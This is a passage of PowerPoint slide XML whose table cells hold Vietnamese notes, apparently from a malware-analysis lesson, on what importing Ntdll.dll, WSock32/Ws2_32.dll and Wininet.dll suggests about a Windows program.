                        <a:rPr lang="en-GB" sz="1600" i="1" dirty="0" smtClean="0"/>
                        <a:t>Ntdll.dll</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1600" i="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sz="1600" dirty="0" smtClean="0"/>
                        <a:t>DLL</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>này</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>cho</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>phép</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>giao</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>tiếp</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>với</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>nhân</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>của</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> HĐH.  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>Thường</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>các</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> file </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>thực</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>thi</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>không</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> import </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>trực</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>tiếp</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>thư</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>viện</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>này</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>mà</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>thực</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>hiện</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>gián</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>tiếp</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>thông</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> qua </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" i="1" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>Kernell32.dll</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>Nếu</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>một</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>c.trình</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> import DLL </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>này</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>thì</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>c.trình</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>đó</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>muốn</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>sử</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>dụng</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>các</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>chức</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>năng</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>không</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>cho</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>phép</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>dùng</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>của</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> Windows </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>như</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>giấu</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> file, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>hoặc</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>xử</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>lý</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>các</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>tác</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>vụ</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> (process)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="16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5918">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" i="1" dirty="0" smtClean="0"/>
                        <a:t>WSock32.dll /Ws2_32.dll</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1600" i="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GB" sz="1600" dirty="0" err="1" smtClean="0"/>
                        <a:t>Đây</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>là</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>các</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>thư</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>viện</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>liên</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>quan</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>đến</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>chức</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>năng</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>mạng</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>Một</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>chương</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>trình</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>sử</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>dụng</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>nó</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>có</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>khả</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>năng</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>sẽ</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>tạo</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>kết</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>nối</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>mạng</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>hoặc</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>thực</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>hiện</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>các</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>tác</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>vụ</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>liên</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>quan</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="16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828">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" i="1" dirty="0" smtClean="0"/>
                        <a:t>Wininet.dll</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1600" i="1"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GB" sz="1600" dirty="0" err="1" smtClean="0"/>
                        <a:t>Thư</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>viện</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>này</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>chứa</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>các</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>chức</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>năng</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>mạng</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>bậc</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>cao</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>để</a:t>
                      </a:r>
                      <a:r>
